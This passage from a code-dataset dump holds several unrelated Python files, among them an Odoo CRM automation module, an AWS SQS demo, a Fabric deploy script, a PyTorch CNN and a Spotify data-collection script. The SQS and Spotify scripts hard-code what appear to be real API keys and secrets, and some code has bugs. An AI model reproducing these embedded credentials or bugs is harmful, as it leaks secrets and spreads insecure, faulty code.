)\n return _request\n \n def _read_origin_request_info_from_header(self):\n proxy_headers = application.config['mock.proxy_headers']\n scheme = self.request.headers.get(proxy_headers['scheme'], default='http')\n host = self.request.headers.get(proxy_headers['host'])\n port = self.request.headers.get(proxy_headers['port'], default='80')\n if not host:\n return {}\n scheme = scheme.strip()\n host = host.strip()\n port = port.strip()\n return dict(\n url=scheme+'://'+host+':'+port+self.request.full_path[len(self.MOCK_PATH_PREFIX):],\n scheme=scheme,\n host=host,\n port=port,\n path=self.request.path[len(self.MOCK_PATH_PREFIX):]\n )\n\n @property\n def response(self):\n return self._response\n\n @response.setter\n def response(self, val):\n self._response = val\n self.update_server_resp_time()\n\n _response = dict(\n code=self._response.status_code,\n headers={k:v for (k,v) in self._response.headers}\n )\n ResponseDataHelper.resp2dict(self._response, output=_response)\n self.flow['response'] = _response\n if val.content_length:\n self.flow['size'] = val.content_length\n else:\n self.flow['size'] = len(val.data)\n self.flow['duration'] = self.server_resp_time - self.client_req_time\n\n if context.application.work_mode == context.Mode.RECORD:\n dm = context.application.data_manager\n group = dm.groups.get(dm.activated_group_id)\n if group:\n data = group.create_data(flow=self.flow)\n data.save()\n\n def _read_response_info(self):\n self._response.headers.get('Content-Type')\n\n def update_client_req_time(self):\n self.client_req_time = time.time()\n # 消息总线 客户端请求事件\n context.application.event_bus.publish('flow',\n dict(name='client.request',\n time=self.client_req_time,\n id=self.id,\n flow=self.flow\n ))\n\n def update_client_resp_time(self):\n self.client_resp_time = time.time()\n # 消息总线 客户端响应事件\n context.application.event_bus.publish('flow',\n dict(name='client.response',\n time=self.client_resp_time,\n id=self.id,\n flow=self.flow))\n\n def update_server_req_time(self):\n self.server_req_time = time.time()\n # 消息总线 客户端请求事件\n context.application.event_bus.publish('flow',\n dict(name='server.request',\n time=self.server_req_time,\n id=self.id,\n flow=self.flow))\n\n def update_server_resp_time(self):\n self.server_resp_time = time.time()\n # 消息总线 客户端请求事件\n context.application.event_bus.publish('flow',\n dict(name='server.response',\n time=self.server_resp_time,\n id=self.id,\n flow=self.flow))\n\n def get_origin_url(self):\n return self.flow['request'].get('url')\n\n\nclass RequestDataHelper:\n\n @staticmethod\n def req2dict(request, output=None):\n if not output:\n output = {}\n content_encoding = request.headers.get('Content-Encoding')\n # Content-Encoding handler\n unziped_data = None\n if content_encoding and content_encoding == 'gzip':\n unziped_data = gzip.decompress(request.data)\n\n content_type = request.headers.get('Content-Type')\n if not content_type:\n output['binary_data'] = 'bin'\n else:\n content_type = content_type.strip()\n\n if content_type.startswith('application/x-www-form-urlencoded'):\n if unziped_data:\n output['data'] = urllib.parse.parse_qs(unziped_data.decode('utf-8'))\n else:\n output['data'] = request.form.to_dict()\n elif content_type.startswith('application/json'):\n if unziped_data:\n output['data'] = json.loads(unziped_data.decode('utf-8'))\n else:\n output['data'] = request.json\n elif content_type.startswith('text/xml'):\n if unziped_data:\n output['data'] = unziped_data.decode('utf-8')\n else:\n output['data'] = request.data.decode('utf-8')\n else:\n # TODO write bin data\n output['binary_data'] = 'bin'\n\n\nclass ResponseDataHelper:\n\n @staticmethod\n def resp2dict(response, output=None):\n if not output:\n output = {}\n content_type = response.headers.get('Content-Type')\n if not content_type:\n output['binary_data'] = 'bin'\n else:\n content_type = content_type.strip()\n \n if content_type.startswith('application/json'):\n output['data'] = response.json\n elif content_type.startswith('text/xml'):\n output['data'] = response.data.decode('utf-8')\n elif content_type.startswith('text/html'):\n output['data'] = response.data.decode('utf-8')\n else:\n # TODO write bin data\n output['binary_data'] = 'bin'\n","sub_path":"lyrebird/mock/handlers/handler_context.py","file_name":"handler_context.py","file_ext":"py","file_size_in_byte":8013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"544324274","text":"# -*- coding: utf-8 -*-\nimport logging\n_logger = logging.getLogger(__name__)\n\nfrom openerp import api, models, fields\nfrom openerp.exceptions import Warning\n\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import datetime\nimport pytz\n\nclass CrmLead(models.Model):\n _inherit = 'crm.lead'\n\n @api.one\n def automation_proces(self, params):\n _logger.info('Aplicando automatizaciones del flujo')\n _logger.info(self.id)\n # example params\n '''\n params = {\n 'action_log': 'custom_17_18_19_enero_2020',\n 'user_id': 1,\n 'next_activity': True,\n 'next_activity_id': 3,\n 'next_activity_date_action': '2020-01-01',\n 'next_activity_title_action': 'Revisar flujo automatico',\n 'mail_template_id': 133\n 'lead_stage_id': 2\n }\n '''\n # special_log\n if 'action_log' in params:\n automation_log_vals = {\n 'model': 'crm.lead',\n 'res_id': self.id,\n 'category': 'crm_lead',\n 'action': str(params['action_log']),\n }\n automation_log_obj = self.env['automation.log'].sudo().create(automation_log_vals)\n # check_user_id crm_lead\n if 'user_id' in params:\n if self.user_id.id == 0:\n user_id_random = int(params['user_id'])\n #write\n self.write({\n 'user_id': user_id_random\n })\n # save_log\n automation_log_vals = {\n 'model': 'crm.lead',\n 'res_id': self.id,\n 'category': 'crm_lead',\n 'action': 'asign_user_id',\n }\n automation_log_obj = self.env['automation.log'].sudo().create(automation_log_vals)\n # fix change user_id res.partner\n if self.partner_id.user_id.id == 0:\n self.partner_id.user_id = user_id_random\n # next_activity_id\n if 'next_activity' in params:\n if params['next_activity'] == True:\n self.self.write({\n 'next_activity_id': int(params['next_activity_id']), # Tarea\n 'date_action': str(params['next_activity_date_action']),\n 'title_action': str(params['next_activity_title_action'])\n })\n # save_log\n automation_log_vals = {\n 'model': 'crm.lead',\n 'res_id': self.opportunity_id.id,\n 'category': 'crm_lead',\n 'action': 'assign_next_activity_id_' + str(params['next_activity_id']),\n }\n automation_log_obj = self.env['automation.log'].sudo().create(automation_log_vals)\n # send_mail\n if 'mail_template_id' in params:\n self.action_send_mail_with_template_id(int(params['mail_template_id']))\n # save_log\n automation_log_vals = {\n 'model': 'crm.lead',\n 'res_id': self.id,\n 'category': 'crm_lead',\n 'action': 'send_mail',\n }\n automation_log_obj = self.env['automation.log'].sudo().create(automation_log_vals)\n # update crm.lead stage_id\n if 'lead_stage_id' in params:\n self.stage_id = int(params['lead_stage_id'])\n # save_log\n automation_log_vals = {\n 'model': 'crm.lead',\n 'res_id': self.id,\n 'category': 'crm_lead',\n 'action': 'change_stage_id',\n }\n automation_log_obj = self.env['automation.log'].sudo().create(automation_log_vals)\n\n @api.one\n def action_send_mail_with_template_id(self, template_id=False):\n if template_id!=False:\n mail_template_item = self.env['mail.template'].browse(template_id)\n mail_compose_message_vals = { \n 'author_id': 1,\n 'record_name': self.name, \n }\n #Fix user_id\n if self.user_id.id>0:\n mail_compose_message_vals['author_id'] = self.user_id.partner_id.id\n mail_compose_message_obj = self.env['mail.compose.message'].with_context().sudo(self.user_id.id).create(mail_compose_message_vals)\n else:\n mail_compose_message_obj = self.env['mail.compose.message'].with_context().sudo().create(mail_compose_message_vals)\n\n return_onchange_template_id = mail_compose_message_obj.onchange_template_id(mail_template_item.id, 'comment', 'crm.lead', self.id)\n #mail_compose_message_obj_vals\n mail_compose_message_obj_vals = {\n 'author_id': mail_compose_message_vals['author_id'],\n 'template_id': mail_template_item.id,\n 'composition_mode': 'comment',\n 'model': 'crm.lead',\n 'res_id': self.id,\n 'body': return_onchange_template_id['value']['body'],\n 'subject': return_onchange_template_id['value']['subject'],\n # 'attachment_ids': return_onchange_template_id['value']['attachment_ids'],\n 'record_name': mail_compose_message_vals['record_name'],\n 'no_auto_thread': False,\n }\n # partner_ids\n if 'email_from' in return_onchange_template_id['value']:\n mail_compose_message_obj_vals['email_from'] = return_onchange_template_id['value']['email_from']\n #partner_ids\n if 'partner_ids' in return_onchange_template_id['value']:\n mail_compose_message_obj_vals['partner_ids'] = return_onchange_template_id['value']['partner_ids']\n #update\n mail_compose_message_obj.update(mail_compose_message_obj_vals)\n #send_mail_action\n mail_compose_message_obj.send_mail_action()\n #return\n return True\n\n @api.multi \n def cron_automation_todocesped_profesional_potenciales(self, cr=None, uid=False, context=None):\n current_date = datetime.now(pytz.timezone('Europe/Madrid'))\n tomorrow_date = current_date + relativedelta(days=+1) \n \n partners = {}\n res_partner_ids = self.env['res.partner'].search(\n [\n ('active', '=', True),\n ('type', '=', 'contact'),\n ('ar_qt_activity_type', '=', 'todocesped'),\n ('ar_qt_customer_type', '=', 'profesional'),\n ('user_id', '!=', False),\n ('create_date', '<', '2018-01-01')\n ]\n ) \n if res_partner_ids!=False: \n res_partner_ids_potencial = []\n for res_partner_id in res_partner_ids:\n if res_partner_id.ref!=False: \n res_partner_ids_potencial.append(res_partner_id.id)\n partners[res_partner_id.id] = res_partner_id \n #account_invoice\n account_invoice_ids = self.env['account.invoice'].search(\n [\n ('state', 'in', ('open','paid')),\n ('amount_total', '>', 0),\n ('type', '=', 'out_invoice'),\n ('partner_id', 'in', res_partner_ids_potencial)\n ]\n ) \n if account_invoice_ids!=False:\n for account_invoice_id in account_invoice_ids:\n if account_invoice_id.partner_id.id in res_partner_ids_potencial:\n res_partner_ids_potencial.remove(account_invoice_id.partner_id.id)\n \n if res_partner_ids_potencial!=False: \n #crm_lead_6_months\n start_date = current_date + relativedelta(months=-6)\n end_date = current_date\n \n for res_partner_id_potencial in res_partner_ids_potencial:\n partner_item = partners[res_partner_id_potencial]\n \n crm_activity_report_ids = self.env['crm.activity.report'].search(\n [\n ('subtype_id', 'in', (1,2,4)),\n ('partner_id', '=', partner_item.id),\n ('lead_id', '!=', False),\n ('date', '>=', start_date.strftime(\"%Y-%m-%d\")),\n ('date', '<=', end_date.strftime(\"%Y-%m-%d\"))\n ]\n )\n if len(crm_activity_report_ids)==0:\n crm_lead_ids = self.env['crm.lead'].search(\n [\n ('active', '=', True),\n ('probability', '<', 100),\n ('partner_id', '=', partner_item.id), \n ('ar_qt_activity_type', '=', partner_item.ar_qt_activity_type),\n ('ar_qt_customer_type', '=', partner_item.ar_qt_customer_type), \n ]\n )\n if len(crm_lead_ids)>0:\n for crm_lead_id in crm_lead_ids:\n change_next_activity = True\n if crm_lead_id.next_activity_id!=False and crm_lead_id.date_action!=False and crm_lead_id.date_action>current_date.strftime(\"%Y-%m-%d\"):\n change_next_activity = False\n \n if change_next_activity==True:\n crm_lead_id.next_activity_id = 1#Email\n crm_lead_id.date_action = tomorrow_date.strftime(\"%Y-%m-%d\")\n crm_lead_id.title_action = 'Email potencial'\n else:\n #Auto-create lead \n crm_lead_vals = {\n 'active': True, \n 'type': 'opportunity',\n 'stage_id': 1,\n 'name': partner_item.name,\n 'partner_id': partner_item.id,\n 'ar_qt_activity_type': partner_item.ar_qt_activity_type,\n 'ar_qt_customer_type': partner_item.ar_qt_customer_type,\n 'user_id': partner_item.user_id.id,\n 'next_activity_id': 1,#Email\n 'date_action': tomorrow_date.strftime(\"%Y-%m-%d\"),\n 'create_date': current_date,\n 'title_action': 'Email potencial' \n }\n crm_lead_obj = self.env['crm.lead'].sudo(partner_item.user_id.id).create(crm_lead_vals)\n crm_lead_obj._onchange_partner_id()\n \n @api.multi \n def cron_automation_todocesped_profesional_potenciales_activo(self, cr=None, uid=False, context=None):\n current_date = datetime.now(pytz.timezone('Europe/Madrid'))\n tomorrow_date = current_date + relativedelta(days=+1) \n \n partners = {}\n res_partner_ids = self.env['res.partner'].search(\n [\n ('active', '=', True),\n ('type', '=', 'contact'), \n ('ar_qt_activity_type', '=', 'todocesped'),\n ('ar_qt_customer_type', '=', 'profesional'),\n ('user_id', '!=', False),\n ('ref', '=', False),\n ('create_date', '>=', '2018-01-01')\n ]\n ) \n if res_partner_ids!=False:\n res_partner_ids_potencial_activo = []\n for res_partner_id in res_partner_ids: \n res_partner_ids_potencial_activo.append(res_partner_id.id)\n partners[res_partner_id.id] = res_partner_id \n #account_invoice\n account_invoice_ids = self.env['account.invoice'].search(\n [\n ('state', 'in', ('open','paid')),\n ('amount_total', '>', 0),\n ('type', '=', 'out_invoice'),\n ('partner_id', 'in', res_partner_ids_potencial_activo)\n ]\n ) \n if account_invoice_ids!=False:\n for account_invoice_id in account_invoice_ids:\n if account_invoice_id.partner_id.id in res_partner_ids_potencial_activo:\n res_partner_ids_potencial_activo.remove(account_invoice_id.partner_id.id)\n \n if res_partner_ids_potencial_activo!=False:\n #crm_lead_3_months\n start_date = current_date + relativedelta(months=-3)\n end_date = current_date\n \n for res_partner_id_potencial_activo in res_partner_ids_potencial_activo:\n partner_item = partners[res_partner_id_potencial_activo]\n \n crm_activity_report_ids = self.env['crm.activity.report'].search(\n [\n ('subtype_id', 'in', (1,2,4)),\n ('partner_id', '=', partner_item.id),\n ('lead_id', '!=', False),\n ('date', '>=', start_date.strftime(\"%Y-%m-%d\")),\n ('date', '<=', end_date.strftime(\"%Y-%m-%d\"))\n ]\n )\n if len(crm_activity_report_ids)==0:\n crm_lead_ids = self.env['crm.lead'].search(\n [\n ('active', '=', True),\n ('probability', '<', 100),\n ('partner_id', '=', partner_item.id), \n ('ar_qt_activity_type', '=', partner_item.ar_qt_activity_type),\n ('ar_qt_customer_type', '=', partner_item.ar_qt_customer_type),\n ]\n )\n if len(crm_lead_ids)>0:\n for crm_lead_id in crm_lead_ids:\n change_next_activity = True\n if crm_lead_id.next_activity_id!=False and crm_lead_id.date_action!=False and crm_lead_id.date_action>current_date.strftime(\"%Y-%m-%d\"):\n change_next_activity = False\n \n if change_next_activity==True:\n crm_lead_id.next_activity_id = 2#Llamada\n crm_lead_id.date_action = tomorrow_date.strftime(\"%Y-%m-%d\")\n crm_lead_id.title_action = 'Llamada potencial activo'\n else:\n #Auto-create lead \n crm_lead_vals = {\n 'active': True, \n 'type': 'opportunity',\n 'stage_id': 1,\n 'name': partner_item.name,\n 'partner_id': partner_item.id,\n 'ar_qt_activity_type': partner_item.ar_qt_activity_type,\n 'ar_qt_customer_type': partner_item.ar_qt_customer_type,\n 'user_id': partner_item.user_id.id,\n 'next_activity_id': 2,#Llamada\n 'date_action': tomorrow_date.strftime(\"%Y-%m-%d\"),\n 'create_date': current_date,\n 'title_action': 'Llamada potencial activo' \n }\n crm_lead_obj = self.env['crm.lead'].sudo(partner_item.user_id.id).create(crm_lead_vals)\n crm_lead_obj._onchange_partner_id()\n \n @api.multi \n def cron_automation_todocesped_profesional_puntuales(self, cr=None, uid=False, context=None):\n _logger.info('cron_automation_todocesped_profesional_puntuales')\n \n @api.multi \n def cron_automation_todocesped_profesional_recurrentes(self, cr=None, uid=False, context=None):\n _logger.info('cron_automation_todocesped_profesional_recurrentes')\n \n @api.multi \n def cron_automation_todocesped_profesional_fidelizados(self, cr=None, uid=False, context=None):\n _logger.info('cron_automation_todocesped_profesional_fidelizados') \n\n @api.multi \n def cron_automation_todocesped_profesional(self, cr=None, uid=False, context=None):\n #potenciales\n #self.cron_automation_todocesped_profesional_potenciales()\n #potenciales_activo\n #self.cron_automation_todocesped_profesional_potenciales_activo()\n #puntuales\n #self.cron_automation_todocesped_profesional_puntuales()\n #recurrentes\n #self.cron_automation_todocesped_profesional_recurrentes()\n #fidelizados\n #self.cron_automation_todocesped_profesional_fidelizados()\n _logger.info('cron_automation_todocesped_profesional') ","sub_path":"arelux_automation/models/crm_lead.py","file_name":"crm_lead.py","file_ext":"py","file_size_in_byte":18511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"175902213","text":"# This script created a queue\n#\n# Author Brian Briscoe\n#\n#\nimport boto.sqs\nimport boto.sqs.queue\nfrom boto.sqs.message import Message\nfrom boto.sqs.connection import SQSConnection\nfrom boto.exception import SQSError\n\n#Establishing neccessary connections\nconn = boto.sqs.connect_to_region(\"us-east-1\", aws_access_key_id='abcAKIAIR7EH3TNSTDUCWKA', aws_secret_access_key='abct2FZT5mrLYy8gX7kS1q0p4ObQYXTwGnaiUm+rxHZ')\n\n#1. Creating queue and setting the name\nq = conn.create_queue('Brian_Briscoes_Queue')\n\n#2. Writing 1 message to the queue\nm = Message()\nm.set_body('Test message using a queue')\nq.write(m)\n\n#3. Writing 100 messages to the queue\nfor i in range(1, 100):\n m = Message()\n m.set_body('This is message %d' % i)\n q.write(m)\n\n#4. Getting the message from the queue\nrs = q.get_messages()\nm = rs[0]\nmessageString = m.get_body()\nprint (messageString)\n\n#5. Deleting a message from the queue\nq.delete_message(m)\n\n","sub_path":"aws/queue_program.py","file_name":"queue_program.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"637149251","text":"#!/usr/bin/python3\n\"\"\"Fabric script that distributes an archive to your web servers\"\"\"\nfrom fabric.api import run, put, env\nfrom os.path import exists\n\nenv.hosts = ['34.75.252.164', '35.237.149.147']\n\n\ndef do_deploy(archive_path):\n \"\"\" Fabric script that distributes an archive to your web servers\"\"\"\n if exists(archive_path) is True:\n try:\n filename = archive_path.split('/')[-1]\n no_ex = filename.split('.')[0]\n put(archive_path, '/tmp/')\n foldername = \"/data/web_static/releases/\" + no_ex\n run(\"mkdir -p {}/\".format(foldername))\n run(\"tar -xzf /tmp/{} -C {}/\".format(filename, foldername))\n run(\"rm /tmp/{}\".format(filename))\n run('mv {}/web_static/* {}/'.format(foldername, foldername))\n run(\"rm -rf {}/web_static\".format(foldername))\n run(\"rm -rf /data/web_static/current\")\n run(\"ln -s {}/\\\n /data/web_static/current\".format(foldername))\n return True\n except:\n return False\n return False\n","sub_path":"2-do_deploy_web_static.py","file_name":"2-do_deploy_web_static.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"569984318","text":"# Default Imports\nfrom greyatomlib.python_getting_started.q01_read_data.build import read_data\ndata = read_data()\n\n\n# Your Solution\ndef BC_runs(data):\n inn = data[\"innings\"][0][\"1st innings\"][\"deliveries\"]\n runs=0\n for i in range (0,len(inn)):\n delv = inn[i]\n if delv[delv.keys()[0]]['batsman'] == 'BB McCullum':\n runs=runs+delv[delv.keys()[0]]['runs']['batsman']\n return(runs)\n","sub_path":"q05_runs/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"517603250","text":"from typing import Any, Dict\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nN_CONVS = 3\nCONV_DIM = 64\nFC_DIM = 128\nIMAGE_SIZE = 28\nKERNEL_SIZE = 3\nSTRIDE = 2\nDROPOUT = .1\n\n\nclass ConvBlock(nn.Module):\n \"\"\"\n ResNet BasicBlock.\n \"\"\"\n def __init__(self, input_channels: int, output_channels: int,\n kernel_size: int = 3, stride: int = 1, dilation: int = 1) -> None:\n super().__init__()\n self.conv1 = nn.Conv2d(input_channels, output_channels, kernel_size=kernel_size, stride=stride, padding=dilation, dilation=dilation)\n self.conv2 = nn.Conv2d(output_channels, output_channels, kernel_size=kernel_size, stride=1, dilation=1, padding=1)\n self.bn1 = nn.BatchNorm2d(output_channels)\n self.bn2 = nn.BatchNorm2d(output_channels)\n self.relu = nn.ReLU()\n\n self.expansion = 1\n if stride > 1:\n self.downsample = nn.Sequential(\n nn.Conv2d(input_channels, output_channels * self.expansion, kernel_size=1, stride=stride),\n nn.BatchNorm2d(output_channels * self.expansion),\n )\n else:\n self.downsample = None\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Parameters\n ----------\n x\n of dimensions (B, C, H, W)\n\n Returns\n -------\n torch.Tensor\n of dimensions (B, C, H, W)\n \"\"\"\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n out = self.conv2(out)\n out = self.bn2(out)\n if self.downsample != None:\n x = self.downsample(x)\n out += x\n out = self.relu(out)\n return out\n\n\nclass CNN(nn.Module):\n \"\"\"Simple CNN for recognizing characters in a square image.\"\"\"\n\n def __init__(self, data_config: Dict[str, Any], args: argparse.Namespace = None) -> None:\n super().__init__()\n self.args = vars(args) if args is not None else {}\n\n input_dims = data_config[\"input_dims\"]\n num_classes = len(data_config[\"mapping\"])\n\n conv_dim = self.args.get(\"conv_dim\", CONV_DIM)\n n_convs = self.args.get(\"n_convs\", N_CONVS)\n fc_dim = self.args.get(\"fc_dim\", FC_DIM)\n kernel_size = self.args.get(\"kernel_size\", KERNEL_SIZE)\n dropout = self.args.get(\"dropout\", DROPOUT)\n stride = self.args.get(\"stride\", STRIDE)\n dilation = self.args.get(\"dilation\", 1)\n\n self.conv1 = ConvBlock(input_dims[0], conv_dim, kernel_size=kernel_size, stride=stride, dilation=dilation)\n if n_convs > 1:\n self.extra_convs = nn.ModuleList([\n ConvBlock(conv_dim, conv_dim, kernel_size=kernel_size, stride=stride, dilation=dilation)\n for i in range(n_convs-1)\n ])\n else:\n self.extra_convs = None\n # self.conv2 = ConvBlock(conv_dim, conv_dim, stride=stride, dilation=1)\n self.dropout = nn.Dropout(dropout)\n\n # Because our 3x3 convs have padding size 1, they leave the input size unchanged.\n # The 2x2 max-pool divides the input size by 2. Flattening squares it.\n conv_output_size = int(((IMAGE_SIZE + (2 * dilation) - kernel_size) / stride) + 1)\n for i in range(n_convs -1):\n conv_output_size = int(((conv_output_size + (2 * dilation) - kernel_size) / stride) + 1)\n fc_input_dim = int(conv_output_size * conv_output_size * conv_dim)\n self.fc1 = nn.Linear(fc_input_dim, fc_dim)\n self.fc2 = nn.Linear(fc_dim, num_classes)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Args:\n x\n (B, C, H, W) tensor, where H and W must equal IMAGE_SIZE\n\n Returns\n -------\n torch.Tensor\n (B, C) tensor\n \"\"\"\n _B, _C, H, W = x.shape\n assert H == W == IMAGE_SIZE\n x = self.conv1(x)\n x = self.dropout(x)\n if self.extra_convs:\n for conv in self.extra_convs:\n x = conv(x)\n x = self.dropout(x)\n # x = self.conv2(x)\n # x = self.dropout(x)\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n return x\n\n @staticmethod\n def add_to_argparse(parser):\n parser.add_argument(\"--n_convs\", type=int, default=N_CONVS)\n parser.add_argument(\"--conv_dim\", type=int, default=CONV_DIM)\n parser.add_argument(\"--fc_dim\", type=int, default=FC_DIM)\n parser.add_argument(\"--stride\", type=int, default=STRIDE)\n parser.add_argument(\"--dropout\", type=float, default=DROPOUT)\n return parser\n","sub_path":"lab2/text_recognizer/models/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22861163","text":"import pandas as pd\nfrom sqlalchemy import create_engine\nimport pymysql\npymysql.install_as_MySQLdb()\nfrom mysql_conn import password\nimport os\nimport spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nfrom pprint import pprint\nimport json\nimport numpy as np\n\n# Change working directory to file location\nabspath = os.path.abspath(__file__)\ndname = os.path.dirname(abspath)\nos.chdir(dname)\n\n# Client credentials\nclient_credentials_manager = SpotifyClientCredentials(\n client_id='7b0e5ed233304809ae9933fd28fb4ee8', \n client_secret='4eed3ec87a9d495abb015fce79cf5314')\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n\n# Today\nimport datetime\ncurrent_date = datetime.datetime.today().strftime('%Y-%m-%d')\n\nplaylist_ids = {'United States Viral 50':'37i9dQZEVXbKuaTI1Z1Afx'} #,\n #'United States Top 50':'37i9dQZEVXbLRQDuF5jeBp'}\n\nplaylist_tracks = [current_date]\n\nfor name, id in playlist_ids.items():\n results = sp.user_playlist_tracks(user = 'spotifycharts', playlist_id = id, fields = 'items(track(name, id, artists))')\n \n tracks = []\n track_id = []\n track_name = []\n track_artist = []\n for result in results['items']:\n tracks.append([result['track']['name'], result['track']['id']])\n track_id.append(result['track']['id'])\n track_name.append(result['track']['name'])\n artist_dict = result['track']['artists'][0]\n track_artist.append(artist_dict['name'])\n playlist_tracks.append([name, tracks])\n\nsongs = pd.DataFrame(np.column_stack([track_id, track_name, track_artist]), \n columns=['Id', 'Track_Name', 'Artist'])\n#print(songs)\n\n# First element shows date for 0th element or changes playlist\n# Third element changes song within each playlist\nsong_id = playlist_tracks[1][1][0][1]\nsong_name = playlist_tracks[1][1][0][0]\n\n#print(f'song id: {song_id}')\n#print(f'song name: {song_name}')\nf_id = []\nf_duration_ms = []\nf_key = []\nf_mode = []\nf_Time_Signature = []\nf_acousticness = []\nf_danceablity = []\nf_energy = []\nf_instrumentalness = []\nf_liveness = []\nf_loudness = []\nf_speechiness = []\nf_valence = []\nf_tempo = []\n\nplaylist_audio_features = []\nfor playlist in playlist_tracks[1:]:\n tracks = []\n\n # Create list of ids for each playlist with max of 50 ids\n id = []\n for i in range(0, len(playlist[1])): \n id.append(playlist[1][i][1])\n \n # list of playlist ids\n tracks.append(id)\n audio_feature = sp.audio_features(tracks = tracks[0])\n #print(audio_feature)\n # Add audio feature for song to dictionary\n playlist_audio_features.append(audio_feature)\n print(f'length of audio_feature: {len(audio_feature)}')\n for i in range(0, len(audio_feature)): \n feature_dict = audio_feature[i]\n f_id.append(feature_dict['id'])\n f_duration_ms.append(feature_dict['duration_ms'])\n f_key.append(feature_dict['key'])\n f_mode.append(feature_dict['mode'])\n f_Time_Signature.append(feature_dict['time_signature'])\n f_acousticness.append(feature_dict['acousticness'])\n f_danceablity.append(feature_dict['danceability'])\n f_energy.append(feature_dict['energy'])\n f_instrumentalness.append(feature_dict['instrumentalness'])\n f_liveness.append(feature_dict['liveness'])\n f_loudness.append(feature_dict['loudness'])\n f_speechiness.append(feature_dict['speechiness'])\n f_valence.append(feature_dict['valence'])\n f_tempo.append(feature_dict['tempo']) \n \n\n\n#playlist_audio_features\n#print(playlist_audio_features[0])\nFeatures = (pd.DataFrame(np.column_stack([f_id, f_duration_ms, f_key, f_mode, f_Time_Signature,\n f_acousticness, f_danceablity, f_energy, f_instrumentalness, f_liveness, f_loudness, f_speechiness, f_valence, f_tempo]), \n columns=(['Id','Duration_ms','Key','Mode','Time_Signature','Acousticness','Danceablity','Energy','Instrumentalness','Liveness','Loudness','Speechiness','Valence','tempo'])))\n\n#print(Features)\n\n# # SQFT Dataset\n# # MySQL Connection\n# Define database within MySQL client\nconnection_string = (f\"root:{password}@localhost\")\nengine = create_engine(f\"mysql://{connection_string}\")\nengine.execute(\"DROP DATABASE IF EXISTS music\")\nengine.execute(\"CREATE DATABASE music\")\nengine.execute(\"USE music\")\n\nengine.execute(\"USE music\")\n(songs.to_sql(\n name = 'songs', con = engine, chunksize = 75))\n #if_exists = 'replace', chunksize = 75))\nwith engine.connect() as con:\n con.execute('ALTER TABLE `songs` modify Id VARCHAR(22);')\n con.execute('ALTER TABLE `songs` ADD PRIMARY KEY (`Id`);')\n\nengine.execute(\"USE music\")\n(Features.to_sql(\n name = 'Features', con = engine)) #,\n #if_exists = 'replace'))\nwith engine.connect() as con:\n con.execute('ALTER TABLE `Features` modify Id VARCHAR(22);')\n con.execute('ALTER TABLE `Features` ADD PRIMARY KEY (`Id`);')","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":4892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"176654749","text":"# -*- coding: utf-8 -*-\n\n\n\nimport sys\nimport qdarkstyle\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass staff_modify_ui(object):\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(728, 649)\n self.mail = QtWidgets.QLabel(Form)\n self.mail.setGeometry(QtCore.QRect(510, 313, 61, 31))\n self.mail.setObjectName(\"mail\")\n self.t_dep = QtWidgets.QTextEdit(Form)\n self.t_dep.setGeometry(QtCore.QRect(590, 193, 107, 31))\n self.t_dep.setObjectName(\"t_dep\")\n\n self.t_tel = QtWidgets.QTextEdit(Form)\n self.t_tel.setGeometry(QtCore.QRect(590, 253, 135,31))\n self.t_tel.setObjectName(\"t_tel\")\n\n self.dep = QtWidgets.QLabel(Form)\n self.dep.setGeometry(QtCore.QRect(510, 193, 51, 31))\n self.dep.setObjectName(\"dep\")\n\n self.t_skills = QtWidgets.QTextEdit(Form)\n self.t_skills.setGeometry(QtCore.QRect(30, 463, 421, 171))\n self.t_skills.setObjectName(\"t_skills\")\n\n self.title = QtWidgets.QLabel(Form)\n self.title.setGeometry(QtCore.QRect(230, 20, 281, 31))\n self.title.setObjectName(\"title\")\n\n self.salary = QtWidgets.QLabel(Form)\n self.salary.setGeometry(QtCore.QRect(270, 313, 51, 31))\n self.salary.setObjectName(\"salary\")\n\n self.t_duty = QtWidgets.QTextEdit(Form)\n self.t_duty.setGeometry(QtCore.QRect(350, 253, 107, 31))\n self.t_duty.setObjectName(\"t_duty\")\n\n self.t_nation = QtWidgets.QTextEdit(Form)\n self.t_nation.setGeometry(QtCore.QRect(350, 133, 107, 31))\n self.t_nation.setObjectName(\"t_nation\")\n\n self.modify = QtWidgets.QPushButton(Form)\n self.modify.setGeometry(QtCore.QRect(540, 583, 171, 41))\n self.modify.setObjectName(\"add\")\n \n \n\n self.bir = QtWidgets.QLabel(Form)\n self.bir.setGeometry(QtCore.QRect(30, 133, 81, 31))\n self.bir.setObjectName(\"bir\")\n\n self.entry = QtWidgets.QLabel(Form)\n self.entry.setGeometry(QtCore.QRect(30, 373, 81, 31))\n self.entry.setObjectName(\"entry\")\n\n self.rank = QtWidgets.QLabel(Form)\n self.rank.setGeometry(QtCore.QRect(30, 313, 51, 31))\n self.rank.setObjectName(\"rank\")\n\n self.t_entry = QtWidgets.QTextEdit(Form)\n self.t_entry.setGeometry(QtCore.QRect(110, 373, 121, 31))\n 